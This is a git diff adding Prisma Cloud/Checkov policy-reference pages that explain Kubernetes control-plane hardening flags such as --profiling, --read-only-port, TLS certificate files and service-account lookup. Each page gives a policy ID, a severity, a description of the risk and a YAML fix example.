+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-scheduler + tier: control-plane + name: kube-scheduler + namespace: kube-system +spec: + containers: + - command: ++ - kube-scheduler ++ - --profiling=false + image: gcr.io/google_containers/kube-scheduler-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-2.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-2.adoc new file mode 100644 index 000000000..b92bdb389 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-2.adoc @@ -0,0 +1,65 @@ +== The --profiling argument is not set to false for API server +// '--profiling' argument not set to false for API server + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2fa82602-23c7-4cfc-8b78-56743c4b89f4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py[CKV_K8S_90] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable profiling, if not needed. +Profiling allows for the identification of specific performance bottlenecks. +It generates a significant amount of program data that could potentially be exploited to uncover system and program details. +If you are not experiencing any bottlenecks and do not need the profiler for troubleshooting purposes, it is recommended to turn it off to reduce the potential attack surface. 
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --profiling=false + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false.adoc new file mode 100644 index 000000000..0f35e804f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false.adoc @@ -0,0 +1,65 @@ +== The --profiling argument for controller managers is not set to False +// '-profiling' argument for controller managers not set to False + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7a042645-57fd-45ed-a17e-fed49c8333e9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py[CKV_K8S_107] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable profiling, if not needed. +Profiling allows for the identification of specific performance bottlenecks. +It generates a significant amount of program data that could potentially be exploited to uncover system and program details. +If you are not experiencing any bottlenecks and do not need the profiler for troubleshooting purposes, it is recommended to turn it off to reduce the potential attack surface. 
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-controller-manager + tier: control-plane + name: kube-controller-manager + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --profiling=false + image: gcr.io/google_containers/kube-controller-manager-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-protect-kernel-defaults-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-protect-kernel-defaults-argument-is-set-to-true.adoc new file mode 100644 index 000000000..2095a4a0a --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-protect-kernel-defaults-argument-is-set-to-true.adoc @@ -0,0 +1,67 @@ +== The --protect-kernel-defaults argument is not set to True +// '--protect-kernel-defaults' argument not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3bbdacbb-5205-4f71-b7c4-baed2e5300fc + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py[CKV_K8S_144] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Protect tuned kernel parameters from overriding kubelet default kernel parameter values. +Kernel parameters are usually tuned and hardened by the system administrators before putting the systems into production. +These parameters protect the kernel and the system. +Your kubelet kernel defaults that rely on such parameters should be appropriately set to match the desired secured system state. +Ignoring this could potentially lead to running pods with undesired kernel behavior. 
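As a sketch of what this means in practice: with `--protect-kernel-defaults=true`, the kubelet fails fast when certain sysctls differ from the values it expects instead of silently overriding them. The flag check below is illustrative, and the sysctl list is an assumption based on common kubelet behavior — verify it against your kubelet version:

```python
# Sysctls the kubelet typically validates when --protect-kernel-defaults=true
# (assumed list; confirm against your kubelet version's documentation).
PROTECTED_SYSCTLS = [
    "vm.overcommit_memory",
    "vm.panic_on_oom",
    "kernel.panic",
    "kernel.panic_on_oops",
]


def protect_kernel_defaults_set(command):
    """Pass when the kubelet command opts in to protecting kernel defaults."""
    return "--protect-kernel-defaults=true" in command
```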
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --protect-kernel-defaults=true + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-read-only-port-argument-is-set-to-0.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-read-only-port-argument-is-set-to-0.adoc new file mode 100644 index 000000000..00a64dfd7 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-read-only-port-argument-is-set-to-0.adoc @@ -0,0 +1,65 @@ +== The --read-only-port argument is not set to 0 +// 'The '--read-only-port' argument not set to 0 + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 127c19c7-71ed-4aaa-9786-b2aecb556b83 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py[CKV_K8S_141] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable the read-only port. +The Kubelet process provides a read-only API in addition to the main Kubelet API. +Unauthenticated access is provided to this read-only API which could possibly retrieve potentially sensitive information about the cluster. 
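The condition can be sketched as a check that the port is explicitly zero (an illustrative helper, not the actual Checkov code; because the default for an unset flag has varied across kubelet versions, the sketch conservatively flags the absent case):

```python
def read_only_port_disabled(command):
    """Pass only when --read-only-port is explicitly set to 0."""
    for arg in command:
        key, _, value = arg.partition("=")
        if key == "--read-only-port":
            return value == "0"
    return False  # unset: default differs across kubelet versions, so flag it
```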
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --read-only-port=0 + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-request-timeout-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-request-timeout-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..a4ac1a548 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-request-timeout-argument-is-set-as-appropriate.adoc @@ -0,0 +1,67 @@ +== The --request-timeout argument is not set appropriately +// '--request-timeout' argument not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 36b3a264-517b-4b3c-ab08-bfe8fe9326e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py[CKV_K8S_95] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Set global request timeout for API server requests as appropriate. +Setting global request timeout allows extending the API server request timeout limit to a duration appropriate to the user's connection speed. +By default, it is set to 60 seconds which might be problematic on slower connections making cluster resources inaccessible once the data volume for requests exceeds what can be transmitted in 60 seconds. +But, setting this timeout limit to be too large can exhaust the API server resources making it prone to Denial-of-Service attack. 
+Hence, it is recommended to set this limit as appropriate and change the default limit of 60 seconds only if needed. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --request-timeout=2m3s + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-root-ca-file-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-root-ca-file-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..41cf5c47a --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-root-ca-file-argument-is-set-as-appropriate.adoc @@ -0,0 +1,65 @@ +== The --root-ca-file argument for controller managers is not set appropriately +// 'The '--root-ca-file' argument for controller managers not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| aa9d1111-eb5b-4549-8ea7-3d57d9d59f93 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py[CKV_K8S_111] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Allow pods to verify the API server's serving certificate before establishing connections. +Processes running within pods that need to contact the API server must verify the API server's serving certificate. +Failing to do so could be a subject to man-in-the-middle attacks. 
+Providing the root certificate for the API server's serving certificate to the controller manager with the --root-ca-file argument allows the controller manager to inject the trusted bundle into pods so that they can verify TLS connections to the API server. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-controller-manager + tier: control-plane + name: kube-controller-manager + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --root-ca-file=private.pem + image: gcr.io/google_containers/kube-controller-manager-amd64:v1.6.0", +} +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotate-certificates-argument-is-not-set-to-false.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotate-certificates-argument-is-not-set-to-false.adoc new file mode 100644 index 000000000..69aa896ad --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotate-certificates-argument-is-not-set-to-false.adoc @@ -0,0 +1,67 @@ +== The --rotate-certificates argument is set to false +// '--rotate-certificates' argument set to False + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 82c6e27a-d022-4cd7-a277-49945c706c14 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py[CKV_K8S_149] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Enable kubelet client certificate rotation. +The --rotate-certificates setting causes the kubelet to rotate its client certificates by creating new CSRs as its existing credentials expire. 
+This automated periodic rotation ensures that there is no downtime due to expired certificates, thus addressing availability in the CIA security triad. + +NOTE: This recommendation only applies if you let kubelets get their certificates from the API server. In case your kubelet certificates come from an outside authority/tool (e.g. Vault) then you need to take care of rotation yourself. + + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-scheduler + tier: control-plane + name: kube-scheduler + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --rotate-certificates=true + image: gcr.io/google_containers/kube-scheduler-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager.adoc new file mode 100644 index 000000000..28ea1b77b --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager.adoc @@ -0,0 +1,66 @@ +== The RotateKubeletServerCertificate argument for controller managers is not set to True +// 'RotateKubeletServerCertificate' argument for controller managers not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9502fa48-b6f7-42a4-9b06-ac1e5b1bff28 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py[CKV_K8S_112] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + 
+ +=== Description + + +Enable kubelet server certificate rotation. +RotateKubeletServerCertificate causes the kubelet to both request a serving certificate after bootstrapping its client credentials and rotate the certificate as its existing credentials expire. +This automated periodic rotation ensures that there are no downtimes due to expired certificates, thus addressing availability in the CIA security triad. + +NOTE: This recommendation only applies if you let kubelets get their certificates from the API server. In case your kubelet certificates come from an outside authority/tool (e.g. Vault) then you need to take care of rotation yourself. + + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --feature-gates=RotateKubeletServerCertificate=true + image: gcr.io/google_containers/kubelet-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-secure-port-argument-is-not-set-to-0.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-secure-port-argument-is-not-set-to-0.adoc new file mode 100644 index 000000000..744a556a9 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-secure-port-argument-is-not-set-to-0.adoc @@ -0,0 +1,65 @@ +== The --secure-port argument is set to 0 +// '--secure-port' argument set to 0 + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f249eee4-5695-43a9-bf08-0372dda79ce6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py[CKV_K8S_89] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks 
+|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not disable the secure port. +The secure port is used to serve https with authentication and authorization. +If you disable it, no https traffic is served and all traffic is served unencrypted. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --secure-port=80 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-key-file-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-key-file-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..15a973c37 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-key-file-argument-is-set-as-appropriate.adoc @@ -0,0 +1,66 @@ +== The --service-account-key-file argument is not set appropriately +// '--service-account-key-file' argument not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 85a7d846-9c95-46be-9368-6c9091604505 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py[CKV_K8S_97] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Explicitly set a service account public key file for service accounts on the apiserver. 
+By default, if no --service-account-key-file is specified to the apiserver, it uses the private key from the TLS serving certificate to verify service account tokens. +To ensure that the keys for service account tokens could be rotated as needed, a separate public/private key pair should be used for signing service account tokens. +Hence, the public key should be specified to the apiserver with --service-account-key-file. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --service-account-key-file=/keys/key.pem + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-lookup-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-lookup-argument-is-set-to-true.adoc new file mode 100644 index 000000000..666a1b893 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-lookup-argument-is-set-to-true.adoc @@ -0,0 +1,66 @@ +== The --service-account-lookup argument is not set to true +// '--service-account-lookup' argument not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 498e4ff0-b3aa-40b3-a6f3-0e2ca2429322 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py[CKV_K8S_96] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Validate service account before validating token. 
+If `--service-account-lookup` is not enabled, the apiserver only verifies that the authentication token is valid, and does not validate that the service account token mentioned in the request is actually present in etcd. +This allows using a service account token even after the corresponding service account is deleted. +This is an example of a time-of-check to time-of-use (TOCTOU) security issue. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --service-account-lookup=true + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..11d652ee9 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate.adoc @@ -0,0 +1,64 @@ +== The --service-account-private-key-file argument for controller managers is not set appropriately +// '--service-account-private-key-file' argument for controller managers not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 28873c1a-82d2-4390-9e59-ca4e99a709e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py[CKV_K8S_110] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + 
+=== Description + + +Explicitly set a service account private key file for service accounts on the controller manager. +To ensure that keys for service account tokens can be rotated as needed, a separate public/private key pair should be used for signing service account tokens. +The private key should be specified to the controller manager with --service-account-private-key-file as appropriate. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-controller-manager + tier: control-plane + name: kube-controller-manager + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --service-account-private-key-file=private.pem + image: gcr.io/google_containers/kube-controller-manager-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0.adoc new file mode 100644 index 000000000..997d1c25c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0.adoc @@ -0,0 +1,66 @@ +== The --streaming-connection-idle-timeout argument is set to 0 +// '--streaming-connection-idle-timeout' argument set to 0 + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 87d48757-cb0e-4662-b1a4-063eb0ecc807 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py[CKV_K8S_143] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not disable
timeouts on streaming connections. +Setting idle timeouts ensures that you are protected against Denial-of-Service attacks, inactive connections and running out of ephemeral ports. +By default, --streaming-connection-idle-timeout is set to 4 hours, which might be too high for your environment. +Setting this as appropriate would additionally ensure that such streaming connections are timed out after serving legitimate use cases. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --streaming-connection-idle-timeout=1 + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..e5c26d524 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate.adoc @@ -0,0 +1,98 @@ +== The --terminated-pod-gc-threshold argument for controller managers is not set appropriately +// '--terminated-pod-gc-threshold' argument for controller managers not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5572ef68-3823-48f9-b2d0-e17d6d002366 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py[CKV_K8S_106] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== 
Description + + +Activate garbage collection on pod termination, as appropriate. +Garbage collection is important to ensure sufficient resource availability and to avoid degraded performance and availability. +In the worst case, the system might crash or just be unusable for a long period of time. +The current setting for garbage collection is 12,500 terminated pods, which might be too high for your system to sustain. +Based on your system resources and tests, choose an appropriate threshold value to activate garbage collection. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-controller-manager + tier: control-plane + name: kube-controller-manager + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --terminated-pod-gc-threshold=555 + image: gcr.io/google_containers/kube-controller-manager-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-controller-manager-should-pass + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki ", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet.adoc new file mode 100644 index
000000000..b2e1e98b5 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet.adoc @@ -0,0 +1,66 @@ +== The --tls-cert-file and --tls-private-key-file arguments for Kubelet are not set appropriately +// '--tls-cert-file' and '--tls-private-key-file' arguments for Kubelet not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2d52b41d-84d8-4afc-8533-50053491e28f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py[CKV_K8S_148] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Kubelet communication contains sensitive parameters that should remain encrypted in transit. +Configure the kubelet to serve only HTTPS traffic by setting up a TLS connection on the kubelet. +By default, the --tls-cert-file and --tls-private-key-file arguments are not set.
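At build time this policy reduces to inspecting the kubelet container's command line in the pod manifest. A minimal Python sketch of that inspection follows; it is illustrative only, not the actual Checkov implementation, and the function name `has_tls_flags` is hypothetical.

```python
# Illustrative sketch of the command-line inspection this policy performs.
# Not the actual Checkov implementation; names are hypothetical.

REQUIRED_FLAGS = {"--tls-cert-file", "--tls-private-key-file"}

def has_tls_flags(pod_spec):
    """Return True only if every container's command sets both TLS flags."""
    for container in pod_spec.get("containers", []):
        # Collect flag names, ignoring any "=value" suffix.
        flags = {arg.split("=", 1)[0] for arg in container.get("command", [])
                 if arg.startswith("--")}
        if not REQUIRED_FLAGS <= flags:
            return False
    return True
```

A manifest whose kubelet command omits either flag would fail this check and be reported as a build-time violation.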
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system + spec: + containers: + - command: + - kubelet ++ - --tls-cert-file=/path/to/cert ++ - --tls-private-key-file=/path/to/key + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate.adoc new file mode 100644 index 000000000..ace69d197 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate.adoc @@ -0,0 +1,97 @@ +== The --tls-cert-file and --tls-private-key-file arguments for API server are not set appropriately +// '--tls-cert-file' and '--tls-private-key-file' arguments for API server not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 00a6ace3-35ea-4d46-9814-221875ffcd47 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py[CKV_K8S_100] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +API server communication contains sensitive parameters that should remain encrypted in transit. +Configure the API server to serve only HTTPS traffic by setting up a TLS connection on the API server. +By default, the --tls-cert-file and --tls-private-key-file arguments are not set.
